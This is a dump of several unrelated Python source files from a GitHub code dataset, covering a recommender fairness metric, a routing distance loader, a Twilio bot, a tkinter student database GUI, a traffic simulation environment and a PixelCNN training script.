The Delta GAP (Group Average popularity) metric lets you compare the average popularity \"requested\" by one or\n multiple groups of users and the average popularity \"obtained\" with the recommendation given by the recsys.\n It's a system wise metric and results of every group will be returned.\n\n It is calculated as such:\n\n $$\n \\Delta GAP = \\frac{recs_GAP - profile_GAP}{profile_GAP}\n $$\n\n Users are split into groups based on the *user_groups* parameter, which contains names of the groups as keys,\n and percentage of how many user must contain a group as values. For example:\n\n user_groups = {'popular_users': 0.3, 'medium_popular_users': 0.2, 'low_popular_users': 0.5}\n\n Every user will be inserted in a group based on how many popular items the user has rated (in relation to the\n percentage of users we specified as value in the dictionary):\n\n * users with many popular items will be inserted into the first group\n * users with niche items rated will be inserted into one of the last groups.\n\n In general users are grouped by $Popularity\\_ratio$ in a descending order. $Popularity\\_ratio$ for a single user $u$\n is defined as:\n\n $$\n Popularity\\_ratio_u = n\\_most\\_popular\\_items\\_rated_u / n\\_items\\_rated_u\n $$\n\n The *most popular items* are the first `pop_percentage`% items of all items ordered in a descending order by\n popularity.\n\n The popularity of an item is defined as the number of times it is rated in the `original_ratings` parameter\n divided by the total number of users in the `original_ratings`.\n\n It can happen that for a particular user of a group no recommendation are available: in that case it will be skipped\n and it won't be considered in the $\\Delta GAP$ computation of its group. In case no user of a group has recs\n available, a warning will be printed and the whole group won't be considered.\n\n If the 'top_n' parameter is specified, then the $\\Delta GAP$ will be calculated considering only the first\n *n* items of every recommendation list of all users\n\n Args:\n user_groups: Dict containing group names as keys and percentage of users as value, used to\n split users in groups. Users with more popular items rated are grouped into the first group, users with\n slightly less popular items rated are grouped into the second one, etc.\n user_profiles: one or more `Ratings` objects containing interactions of the profile of each user\n (e.g. the **train set**). It should be one for each split to evaluate!\n original_ratings: `Ratings` object containing original interactions of the dataset that will be used to\n compute the popularity of each item (i.e. the number of times it is rated divided by the total number of\n users)\n top_n: it's a cutoff parameter, if specified the Gini index will be calculated considering only their first\n 'n' items of every recommendation list of all users. Default is None\n pop_percentage: How many (in percentage) *most popular items* must be considered. Default is 0.2\n \"\"\"\n\n def __init__(self, user_groups: Dict[str, float], user_profiles: Union[list, Ratings], original_ratings: Ratings,\n top_n: int = None, pop_percentage: float = 0.2):\n if not 0 < pop_percentage <= 1:\n raise ValueError('Incorrect percentage! Valid percentage range: 0 < percentage <= 1')\n\n super().__init__(user_groups)\n self._pop_by_item = get_item_popularity(original_ratings)\n\n if not isinstance(user_profiles, list):\n user_profiles = [user_profiles]\n self._user_profiles = user_profiles\n self.__top_n = top_n\n self._pop_percentage = pop_percentage\n\n def __str__(self):\n name = \"DeltaGap\"\n if self.__top_n:\n name += \" - Top {}\".format(self.__top_n)\n return name\n\n # not a complete repr, better understand how to manage cases with 'ratings' repr\n def __repr__(self):\n return f\"DeltaGap(user_groups={self.user_groups}, top_n={self.__top_n}, pop_percentage={self._pop_percentage})\"\n\n @staticmethod\n def calculate_gap(group: Set[str], avg_pop_by_users: Dict[str, object]) -> float:\n r\"\"\"\n Compute the GAP (Group Average Popularity) formula\n\n $$\n GAP = \\frac{\\sum_{u \\in U}\\cdot \\frac{\\sum_{i \\in i_u} pop_i}{|i_u|}}{|G|}\n $$\n\n Where:\n\n - $G$ is the set of users\n - $i_u$ is the set of items rated/recommended by/to user $u$\n - $pop_i$ is the popularity of item i\n\n Args:\n group: the set of users (user_id)\n avg_pop_by_users: average popularity by user\n\n Returns:\n score (float): gap score\n \"\"\"\n total_pop = 0\n for user in group:\n if avg_pop_by_users.get(user):\n total_pop += avg_pop_by_users[user]\n return total_pop / len(group)\n\n @staticmethod\n def calculate_delta_gap(recs_gap: float, profile_gap: float) -> float:\n \"\"\"\n Compute the ratio between the recommendation gap and the user profiles gap\n\n Args:\n recs_gap: recommendation gap\n profile_gap: user profiles gap\n\n Returns:\n score: delta gap measure\n \"\"\"\n result = 0\n if profile_gap != 0.0:\n result = (recs_gap - profile_gap) / profile_gap\n\n return result\n\n def perform(self, split: Split) -> pd.DataFrame:\n\n # in order to point to the right `user_profile` set each time the\n # `perform()` method is called, we pop the list but add the `user_profile` set\n # back at the end so that DeltaGap is ready for another evaluation without\n # need to instantiate it again\n split_user_profile = self._user_profiles.pop(0)\n self._user_profiles.append(split_user_profile)\n\n predictions = split.pred\n\n if self.__top_n:\n predictions = predictions.take_head_all(self.__top_n)\n\n most_pop_items = get_most_popular_items(self._pop_by_item, self._pop_percentage)\n splitted_user_groups = self.split_user_in_groups(score_frame=split_user_profile, groups=self.user_groups,\n pop_items=most_pop_items)\n\n split_result = defaultdict(list)\n split_result['user_id'] = ['sys']\n\n for group_name in splitted_user_groups:\n\n # we don't consider users of the group for which we do not have any recommendation\n valid_group = splitted_user_groups[group_name].intersection(set(predictions.unique_user_id_column))\n\n if len(valid_group) == 0:\n logger.warning(f\"Group {group_name} won't be considered in the DeltaGap since no recs is available \"\n f\"for any user of said group!\")\n continue\n\n # Computing avg pop by users recs for delta gap\n avg_pop_by_users_recs = self.get_avg_pop_by_users(predictions, self._pop_by_item, valid_group)\n # Computing avg pop by users profiles for delta gap\n avg_pop_by_users_profiles = self.get_avg_pop_by_users(split_user_profile, self._pop_by_item, valid_group)\n\n # Computing delta gap for every group\n recs_gap = self.calculate_gap(group=valid_group, avg_pop_by_users=avg_pop_by_users_recs)\n profile_gap = self.calculate_gap(group=valid_group, avg_pop_by_users=avg_pop_by_users_profiles)\n group_delta_gap = self.calculate_delta_gap(recs_gap=recs_gap, profile_gap=profile_gap)\n\n split_result['{} | {}'.format(str(self), group_name)].append(group_delta_gap)\n\n return pd.DataFrame(split_result)\n","repo_name":"swapUniba/ClayRS","sub_path":"clayrs/evaluation/metrics/fairness_metrics.py","file_name":"fairness_metrics.py","file_ext":"py","file_size_in_byte":23450,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"1783745483","text":"# Load distances\nDISTANCES = []\n# DISTANCES is created as a global object so that it can be accessed by main function and object methods\n# of the truck class.\n\n\ndef load_distance_data(filename):\n \"\"\"Load data from distances CSV into distances triangle matrix\"\"\"\n # Inner and outer loop both have number of iterations proportional to N, giving time complexity of O(N^2)\n # Final result is nested list structure with about (N^2)/2 elements, giving space complexity O(N^2)\n\n # Open file\n with open(filename) as distancesFile:\n # Extract lines of file\n lines = distancesFile.readlines()\n\n # For each line in file\n for i in range(len(lines)):\n\n # Add a list to nested DISTANCES list\n DISTANCES.append([])\n\n # Extract distance values from line\n line = [float(val) for val in lines[i].strip().split(\",\")]\n\n # For each line so far, plus one\n for j in range(i + 1):\n # Append distance value to DISTANCES nested list structure\n DISTANCES[i].append(line[j])\n j += 1\n\n\ndef distance(location_index_alpha, location_index_beta):\n \"\"\"Use distance triangle matrix to calculate distance between two locations\"\"\"\n # Size of input does not vary (two integers) so space and time complexity are constant.\n try:\n return DISTANCES[location_index_alpha][location_index_beta]\n except IndexError:\n # If initial access triggers an IndexError, try access after swapping row index and column index\n return DISTANCES[location_index_beta][location_index_alpha]\n","repo_name":"burnermax37/C950_Algorithms_Project","sub_path":"Distances.py","file_name":"Distances.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31213295110","text":"from django.shortcuts import render,HttpResponse\nfrom twilio.rest import Client\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\n\nclient=Client(settings.TWILIO_ACCOUNT_SID,settings.TWILIO_AUTH_TOKEN)\n\n@csrf_exempt\n\n\ndef bot(request):\n message= request.POST[\"Body\"]\n sender_name=request.POST[\"ProfileName\"]\n sender_number=request.POST[\"From\"]\n if message=='Hi':\n client.messages.create(to='whatsapp:+91xxxxxxx',\n from_='whatsapp:+14155238886',\n body=f\"Hello,{sender_name}\")\n\n return HttpResponse(\"hello\")\n","repo_name":"nadiya123123/twilio_verificatin","sub_path":"wpapi/twilioapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43367126616","text":"from tkinter import*\nimport stdDB_BackEnd\nfrom tkinter import ttk\nimport tkinter.messagebox\nimport random\nimport datetime\nimport time\nimport tempfile, os\n\n#FrontEnd\n\nroot = Tk()\nroot.title(\"STUDENT DATABASE MANAGEMENT SYSTEM\")\nroot.geometry('1300x1300')\nroot.resizable(width=False , height=False)\n\nStdID = StringVar()\nFirstname = StringVar()\nSurname = StringVar()\nDoB = StringVar()\nAge = StringVar()\nGender = StringVar()\nAddress= StringVar()\nMobile = StringVar()\n\n#==================================FRAMES=======================================\nMainFrame = Frame(root,width =1295, height =1295, bd=10, relief=RIDGE, bg=\"cadet blue\")\nMainFrame.grid()\n\nTopFrame = Frame(root, width =1275, height =1295, bd = 8, relief=RIDGE)\nTopFrame.place(x=10, y=10)\nTitleFrame = Frame(root, width =1256, height =130, bd =10, relief=RIDGE)\nTitleFrame.place(x=20, y=20)\n\nTopFrame1 = Frame(root, width =1255, height =550, bd =10, relief=RIDGE, bg=\"cadet blue\")\nTopFrame1.place(x=20, y=150)\n\nLeftFrame = Frame(TopFrame1, width =400, height =417, bd =10, relief=RIDGE)\nLeftFrame.place(x=0, y=0)\nRightFrame = Frame(TopFrame1, width =832, height =417, bd =10, relief=RIDGE)\nRightFrame.place(x=403, y=0)\n\n\nButtonFrame = Frame(TopFrame1, width =1235, height =100, bd =10, relief=RIDGE)\nButtonFrame.place(x=0 , y=420)\n\n#=======================================TITLE==============================================\n\nTitle = Label(TitleFrame, font=('arial', 53,'bold'), text=\"STUDENT MANAGEMENT SYSTEM\", bd=10)\nTitle.place(x=25 ,y=10)\n\n#====================================== FUNCTIONS ===================================================\ndef iExit():\n iExit = tkinter.messagebox.askyesno(\"Student Management System\",\"Confirm if you want to exit\")\n if iExit > 0:\n root.destroy()\n return\n\ndef iReset():\n txtStdID.delete(0, END)\n txtFirstname.delete(0, END)\n txtSurname.delete(0, END)\n txtDoB.delete(0, END)\n txtAge.delete(0, END)\n cboGender.set(\"\")\n txtAddress.delete(0, END)\n txtMobile.delete(0, END)\n\ndef addData():\n if StdID.get() ==\"\" or Firstname.get() ==\"\" or Surname.get() ==\"\":\n tkinter.messagebox.askyesno(\"Student Management System\",\"Enter correct data please\")\n\n else:\n stdDB_BackEnd.addStdRec(StdID.get(),Firstname.get(),Surname.get(),DoB.get(),Age.get(),Gender.get(),Address.get(),Mobile.get())\n\n super(studentlist, self).delete()\n studentlist.insert(END.StdID.get(),Firstname.get(),Surname.get(),DoB.get(),Age.get(),Gender.get(),Address.get(),Mobile.get())\n\n DisplayData()\n\ndef DisplayData():\n result = stdDB_BackEnd.viewData()\n if len(result)!= 0:\n studentlist.delete(studentlist.get_children())\n for row in result:\n studentlist.insert('',END,values =row)\n\n\n\ndef StudentRec():\n global sd\n iReset()\n viewInfo = studentlist.focus()\n learnerData = studentlist.item(viewInfo)\n sd = learnerData['values']\n\n txtStdID.insert(END,sd[1])\n txtFirstname.insert(END,sd[2])\n txtSurname.insert(END,sd[3])\n txtDoB.insert(END,sd[4])\n txtAge.insert(END,sd[5])\n Gender.set(sd[6])\n txtAddress.insert(END,sd[7])\n txtMobile.insert(END,sd[8])\n\ndef DeleteData():\n if(len(StdID.get())!=0):\n stdDB_BackEnd.deleteRec(sd[0])\n iReset()\n DisplayData()\n tkinter.messagebox.showinfo(\"Data Entry Form\",\"Record Successfully Deleted\")\n\n\n\n\n#==================================LABELS & BUTTONS========================================\nlblStdID = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Student ID\", bd =7)\nlblStdID.place(x=0 , y=0)\ntxtStdID = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=StdID)\ntxtStdID.place(x=120, y=0)\n\nlblFirstname = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Firstname\", bd =7)\nlblFirstname.place(x=0 , y=45)\ntxtFirstname = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Firstname)\ntxtFirstname.place(x=120, y=45)\n\nlblSurname = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Surname\", bd =7)\nlblSurname.place(x=0 , y=90)\ntxtSurname = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Surname)\ntxtSurname.place(x=120, y=90)\n\nlblDoB = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Date of Birth\", bd =7)\nlblDoB .place(x=0 , y=135)\ntxtDoB = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=DoB)\ntxtDoB .place(x=120, y=135)\n\nlblAge = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Age\", bd =7)\nlblAge.place(x=0 , y=180)\ntxtAge = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Age)\ntxtAge.place(x=120, y=180)\n\nGender = Label(LeftFrame, text=\"Gender:\",font=('arial',12,'bold'), bd=5)\nGender.place(x=0, y=225)\ncboGender = ttk.Combobox(LeftFrame, font=('arial', 12, 'bold'), width=26, state='readonly', textvariable=Gender)\ncboGender['values']= ('', 'Male', 'Female')\ncboGender.current(0)\ncboGender.place(x=120, y=225)\n\nlblAddress = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Address\", bd =7)\nlblAddress.place(x=0 , y=270)\ntxtAddress = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Address)\ntxtAddress.place(x=120, y=270)\n\nlblMobile = Label(LeftFrame, font=('arial', 12, 'bold'), text=\"Mobile\", bd =7)\nlblMobile.place(x=0 , y=315)\ntxtMobile = Entry(LeftFrame, font=('arial',12,'bold'), bd=5, width=26, textvariable=Mobile)\ntxtMobile.place(x=120, y=315)\n\n#=======================================TREE VIEW====================================================\ncolumn = ('no','stdid','firstname','surname','dob','age','gender','address','mobile')\n\ntree = ttk.Treeview(RightFrame, column=column, show='headings')\n\ntree.heading('no', text='No')\ntree.heading('stdid', text='Student ID')\ntree.heading('firstname', text='Firstname')\ntree.heading('surname', text='Surname')\ntree.heading('dob', text='Date of Birth')\ntree.heading('age', text='Age')\ntree.heading('gender', text='Gender')\ntree.heading('address', text='Address')\ntree.heading('mobile', text='Mobile')\n\n\ntree.column(\"no\", width=10)\ntree.column(\"stdid\", width=10)\ntree.column(\"firstname\", width=10)\ntree.column(\"surname\", width=10)\ntree.column(\"dob\", width=10)\ntree.column(\"age\", width=10)\ntree.column(\"gender\", width=10)\ntree.column(\"address\", width=10)\ntree.column(\"mobile\", width=10)\n\ntree.place(x=0,y=0, height=395, width=810)\n\n#======================================= BUTTONS ================================================\nbtnAddNew = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Add New\", width=12,height=2, command=addData)\nbtnAddNew.place(x=10, y=0)\n\nbtnDisplay = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Display\", width=13,height=2, command=DisplayData)\nbtnDisplay.place(x=240, y=0)\n\nbtnDelete = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Delete\", width=13,height=2, command=DeleteData)\nbtnDelete.place(x=480, y=0)\n\nbtnReset = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Reset\", width=13,height=2, command=iReset)\nbtnReset.place(x=720, y=0)\n\nbtnExit = Button(ButtonFrame, bd=4, font=('arial',20, 'bold'), text=\"Exit\", width=13,height=2, command=iExit)\nbtnExit.place(x=970, y=0)\n\n\nroot.mainloop();","repo_name":"shija-python/Student-Management-System","sub_path":"Student_DB_FrontEnd.py","file_name":"Student_DB_FrontEnd.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40832275057","text":"import logging\r\nimport time\r\nimport gym\r\nimport numpy as np\r\nimport random\r\nimport math\r\nfrom gym import spaces\r\nfrom gym.utils import seeding\r\nimport color\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass CarmapEnv(gym.Env):\r\n metadata = {\r\n 'render.modes': ['human', 'rgb_array'],\r\n 'video.frames_per_second': 50\r\n }\r\n\r\n def __init__(self):\r\n # 设置最大的车流数量\r\n self.car_num = 3000\r\n\r\n # 设置车道数\r\n self.lan_num = 8\r\n\r\n # 屏幕世界尺寸\r\n self.screen_world_width = 800\r\n self.screen_world_height = 800\r\n\r\n # 实际世界尺寸(车道宽度为3.2)\r\n self.real_world_width = 200\r\n self.real_world_height = 200\r\n self.real_lane_width = 3.2\r\n self.real_lane_height = 3.2\r\n # 实际车辆尺寸(长3,宽3)\r\n self.real_car_width = 3\r\n self.real_car_height = 3\r\n\r\n # 归一化尺寸\r\n self.min_xposition = 0\r\n self.max_xposition = 1\r\n self.min_yposition = 0\r\n self.max_yposition = self.real_world_height / self.real_world_width\r\n self.normalization_world_width = self.max_xposition - self.min_xposition\r\n self.normalization_world_height = self.max_yposition - self.min_yposition\r\n\r\n # 屏幕尺寸和归一化尺寸之比(x轴,y轴)\r\n self.screen_xscale = self.screen_world_width / self.normalization_world_width\r\n self.screen_yscale = self.screen_world_height / self.normalization_world_height\r\n\r\n # 实际尺寸和归一化尺寸之比(x轴,y轴)\r\n self.real_xscale = self.real_world_width / self.normalization_world_width\r\n self.real_yscale = self.real_world_height / self.normalization_world_height\r\n\r\n # 屏幕车辆,车道尺寸\r\n self.screen_car_width = self.screen_xscale * self.real_car_width / self.real_xscale\r\n self.screen_car_height = self.screen_yscale * self.real_car_height / self.real_yscale\r\n self.screen_lan_width = self.screen_xscale * self.real_lane_width / self.real_xscale\r\n self.screen_lan_height = self.screen_yscale * self.real_lane_width / self.real_yscale\r\n self.border_width = (self.screen_world_width / 2) - (self.lan_num / 2) * self.screen_lan_width\r\n self.border_height = (self.screen_world_height / 2) - (self.lan_num / 2) * self.screen_lan_height\r\n\r\n # 设置最大速度\r\n self.real_maxspeed = 16.6667\r\n self.real_minspeed = 0.0\r\n self.normalization_maxspeed = self.real_maxspeed / self.real_xscale\r\n self.normalization_minspeed = self.real_minspeed / self.real_xscale\r\n # 设置最大通信距离\r\n self.real_con_dis = 30\r\n self.normalization_maxspeed = self.real_con_dis / self.real_xscale\r\n\r\n\r\n #设置最低状态\r\n self.car_low_state = np.array([\r\n [self.min_xposition, self.normalization_maxspeed,270],\r\n [self.min_yposition, self.normalization_maxspeed,180]],\r\n dtype = np.float64\r\n )\r\n #设置最高状态\r\n self.car_high_state = np.array([\r\n [self.max_xposition, self.normalization_maxspeed, 90],\r\n [self.max_yposition, self.normalization_maxspeed, 0]],\r\n dtype=np.float64\r\n )\r\n\r\n #设置车辆观测空间(连续BOX)(观察:x位置速度,y位置速度)\r\n self.car_observation_space = spaces.Box(\r\n low = self.car_low_state,\r\n high = self.car_high_state,\r\n dtype=np.float64\r\n )\r\n\r\n #设置随即种子\r\n self.seed()\r\n self.s_id = -1\r\n self.t_id = -1\r\n self.viewer = None\r\n self.car_state = None\r\n self.connect_state = None\r\n\r\n def seed(self, seed=None):\r\n self.np_random, seed = seeding.np_random(seed)\r\n return [seed]\r\n\r\n def car_step(self, action):\r\n return self.car_state,{}\r\n\r\n def rans(self):\r\n self.ran = random.sample(range(self.min_xposition * 1000, self.max_xposition * 1000), self.car_num)\r\n self.ran2 = self.np_random.uniform(range(0, int(self.normalization_maxspeed * 10000)),self.car_num)\r\n\r\n def reset(self):\r\n #状态:x位置,y位置,速度大小,速度方向\r\n reset_state = []\r\n self.rans()\r\n for each in range(self.car_num):\r\n # 八车道十字路口,右侧通行规则\r\n lane = random.randrange(1,17)\r\n # 1-8车道用于X轴,1-4向东,5-8向西\r\n if lane <= 8:\r\n ypos = (self.border_height + (lane - 1) * self.screen_lan_width + self.screen_lan_width/2) / self.screen_yscale\r\n if lane <= 4:\r\n v = 0\r\n xpos = self.ran[each]/1000\r\n else:\r\n v = 180\r\n xpos = self.ran[each]/1000\r\n # 9-16车道用于Y轴,9-13向东,13-16向西\r\n elif lane >= 9 and lane<=16:\r\n xpos = (self.border_width + (lane - 9) * self.screen_lan_width + self.screen_lan_width/2) / self.screen_xscale\r\n if lane <= 13:\r\n v = 90\r\n ypos = self.ran[each]/1000\r\n else:\r\n v = 270\r\n ypos = self.ran[each]/1000\r\n reset_state.append([[xpos, ypos],[self.ran2[each] / 10000, v]])\r\n self.car_state = np.array(reset_state)\r\n return np.array(self.car_state)\r\n\r\n def render(self, connect1=[], connect2=[], c1=(0,0,0), c2=(1,0,0),mode='human'):\r\n if self.viewer is None:\r\n from gym.envs.classic_control import rendering\r\n colors = color.ncolors(self.car_num)\r\n #生成界面\r\n self.viewer = rendering.Viewer(self.screen_world_width, self.screen_world_height)\r\n\r\n self.boder1 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder1.set_color(0.745, 0.745, 0.745)\r\n self.viewer.add_geom(self.boder1)\r\n\r\n self.boder2 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder2.set_color(0.745, 0.745, 0.745)\r\n self.boder2.add_attr(rendering.Transform(translation=(0, self.screen_world_height - self.border_height)))\r\n self.viewer.add_geom(self.boder2)\r\n\r\n self.boder3 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder3.set_color(0.745, 0.745, 0.745)\r\n self.boder3.add_attr(rendering.Transform(translation=(self.screen_world_width - self.border_width, 0)))\r\n self.viewer.add_geom(self.boder3)\r\n\r\n self.boder4 = rendering.make_polygon([(0,0),(self.border_width,0),(self.border_width,self.border_height),(0,self.border_height)])\r\n self.boder4.set_color(0.745, 0.745, 0.745)\r\n self.boder4.add_attr(rendering.Transform(translation=(self.screen_world_width - self.border_width, self.screen_world_height - self.border_height)))\r\n self.viewer.add_geom(self.boder4)\r\n\r\n #绘制小车\r\n l, r, t, b = -self.screen_car_width / 2, self.screen_car_width / 2, -self.screen_car_height/2, self.screen_car_height/2\r\n self.car_name = locals()\r\n self.cartrans_name = locals()\r\n for each in range(self.car_num):\r\n self.car_name['car' + str(each)] = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\r\n # car_name['car' + str(each)].set_color(colors[each][0]/255,colors[each][1]/255,colors[each][2]/255)\r\n self.car_name['car' + str(each)].set_color(0, 0, 1)\r\n\r\n self.car_name['car' + str(each)].add_attr(rendering.Transform(translation=(0,0)))\r\n self.cartrans_name['cartrans' + str(each)] = rendering.Transform()\r\n self.car_name['car' + str(each)].add_attr(self.cartrans_name['cartrans' + str(each)])\r\n self.viewer.add_geom(self.car_name['car' + str(each)])\r\n\r\n for each in range(self.car_num):\r\n if each not in self.car_state.keys():\r\n xpos = -1\r\n ypos = -1\r\n self.cartrans_name['cartrans' + str(each)].set_translation(\r\n (xpos - self.min_xposition) * self.screen_xscale * 1, (ypos - self.min_yposition) * self.screen_yscale * 1\r\n )\r\n self.cartrans_name['cartrans' + str(each)].set_rotation(\r\n 0 * math.pi\r\n )\r\n continue\r\n if each == self.s_id or each == self.t_id:\r\n self.car_name['car' + str(each)].set_color(0, 0, 0)\r\n self.cartrans_name['cartrans' + str(each)].set_rotation(\r\n ((self.car_state[each][1][1]/180) - 0.5) * math.pi\r\n )\r\n xpos = self.car_state[each][0][0] / self.real_xscale\r\n ypos = self.car_state[each][0][1] / self.real_yscale\r\n # print(\"坐标为\"+str(xpos)+','+str(ypos))\r\n # print(\"坐标为\"+str((xpos - self.min_xposition) * self.xscale * 1)+','+str((ypos - self.min_yposition) * self.yscale * 1))\r\n self.cartrans_name['cartrans' + str(each)].set_translation(\r\n (xpos - self.min_xposition) * self.screen_xscale * 1, (ypos - self.min_yposition) * self.screen_yscale * 1\r\n )\r\n\r\n for each in range(self.lan_num-1):\r\n if each == int((self.lan_num-1)/2):\r\n self.viewer.draw_line((0, self.border_height + (each + 1) * self.screen_lan_height),(self.screen_world_height, self.border_height + (each + 1) * self.screen_lan_height),color=(0, 1, 0))\r\n self.viewer.draw_line((self.border_width + (each + 1) * self.screen_lan_height, 0),(self.border_width + (each + 1) * self.screen_lan_height, self.screen_world_height),color=(0, 1, 0))\r\n else:\r\n self.viewer.draw_line((0, self.border_height + (each+1) * self.screen_lan_width), (self.screen_world_width, self.border_height + (each+1) * self.screen_lan_width), color=(0.745, 0.745, 0.745))\r\n self.viewer.draw_line((self.border_width + (each+1) * self.screen_lan_width, 0), (self.border_width + (each+1) * self.screen_lan_width, self.screen_world_height), color=(0.745, 0.745, 0.745))\r\n\r\n if len(connect1) > 1 and connect1[-1] == self.t_id:\r\n for each in range(len(connect1)-1):\r\n if connect1[each] != connect1[each+1]:\r\n xpos1 = (self.car_state[connect1[each]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos1 = (self.car_state[connect1[each]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n xpos2 = (self.car_state[connect1[each+1]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos2 = (self.car_state[connect1[each+1]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n self.viewer.draw_line((xpos1,ypos1), (xpos2,ypos2), color=c1)\r\n\r\n if len(connect2) > 1 and connect2[-1] == self.t_id:\r\n for each in range(len(connect2)-1):\r\n if connect2[each] != connect2[each+1]:\r\n xpos1 = (self.car_state[connect2[each]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos1 = (self.car_state[connect2[each]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n xpos2 = (self.car_state[connect2[each+1]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos2 = (self.car_state[connect2[each+1]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n self.viewer.draw_line((xpos1,ypos1), (xpos2,ypos2), color=c2)\r\n\r\n return self.viewer.render(return_rgb_array=mode == 'rgb_array')\r\n\r\n def close(self):\r\n if self.viewer:\r\n self.viewer.close()\r\n self.viewer = None","repo_name":"koterial/vanet","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":12216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7079284859","text":"# Aggregate of a field retrieval in a comprehension.\n\nfrom incoq.runtime import *\n\nOPTIONS(\n obj_domain = True,\n default_impl = 'inc',\n)\nQUERYOPTIONS(\n '{sum(o.f) for o in s}',\n params = ['s'],\n impl = 'dem',\n)\n\ns = Set()\nfor x in [1, 2, 3]:\n o = Obj()\n o.f = Set()\n for y in [10, 20, 30]:\n o.f.add(x * y)\n s.add(o)\n\nprint(sorted({sum(o.f) for o in s}))\n","repo_name":"IncOQ/incoq","sub_path":"incoq/tests/programs/aggr/nested/obj_in.py","file_name":"obj_in.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"71303019026","text":"import os\nimport sys\nimport argparse\nimport configparser\nfrom datetime import datetime\nimport pytz\nfrom distutils.util import strtobool\nimport numpy as np\n\nfrom core.layers import PixelCNN\nfrom core.utils import Utils\n\nfrom keras.utils.visualize_util import plot\n\n\ndef train(argv=None):\n ''' train conditional Gated PixelCNN model \n Usage:\n \tpython train_keras_datasets.py -c sample_train.cfg : training example using configfile\n \tpython train_keras_datasets.py --option1 hoge ... : train with command-line options\n python train_keras_datasets.py -c test.cfg --opt1 hoge... : overwrite config options with command-line options\n '''\n\n ### parsing arguments from command-line or config-file ###\n if argv is None:\n argv = sys.argv\n\n conf_parser = argparse.ArgumentParser(\n description=__doc__, # printed with -h/--help\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False\n )\n conf_parser.add_argument(\"-c\", \"--conf_file\",\n help=\"Specify config file\", metavar=\"FILE_PATH\")\n args, remaining_argv = conf_parser.parse_known_args()\n\n defaults = {}\n\n if args.conf_file:\n config = configparser.SafeConfigParser()\n config.read([args.conf_file])\n defaults.update(dict(config.items(\"General\")))\n\n parser = argparse.ArgumentParser(\n parents=[conf_parser]\n )\n parser.set_defaults(**defaults)\n parser.add_argument(\"--nb_epoch\", help=\"Number of epochs [Required]\", type=int, metavar=\"INT\")\n parser.add_argument(\"--batch_size\", help=\"Minibatch size\", type=int, metavar=\"INT\")\n parser.add_argument(\"--conditional\", help=\"model the conditional distribution p(x|h) (default:False)\", type=str, metavar=\"BOOL\")\n parser.add_argument(\"--dataset_name\", help=\"{'mnist', 'cifar10', 'cifar100'}\", type=str, metavar=\"DATASET_NAME\")\n parser.add_argument(\"--nb_pixelcnn_layers\", help=\"Number of PixelCNN Layers (exept last two ReLu layers)\", metavar=\"INT\")\n parser.add_argument(\"--nb_filters\", help=\"Number of filters for each layer\", metavar=\"INT\")\n parser.add_argument(\"--filter_size_1st\", help=\"Filter size for the first layer. (default: (7,7))\", metavar=\"INT,INT\")\n parser.add_argument(\"--filter_size\", help=\"Filter size for the subsequent layers. (default: (3,3))\", metavar=\"INT,INT\")\n parser.add_argument(\"--optimizer\", help=\"SGD optimizer (default: adadelta)\", type=str, metavar=\"OPT_NAME\")\n parser.add_argument(\"--es_patience\", help=\"Patience parameter for EarlyStopping\", type=int, metavar=\"INT\")\n parser.add_argument(\"--save_root\", help=\"Root directory which trained files are saved (default: /tmp/pixelcnn)\", type=str, metavar=\"DIR_PATH\")\n parser.add_argument(\"--timezone\", help=\"Trained files are saved in save_root/YYYYMMDDHHMMSS/ (default: Asia/Tokyo)\", type=str, metavar=\"REGION_NAME\")\n parser.add_argument(\"--save_best_only\", help=\"The latest best model will not be overwritten (default: False)\", type=str, 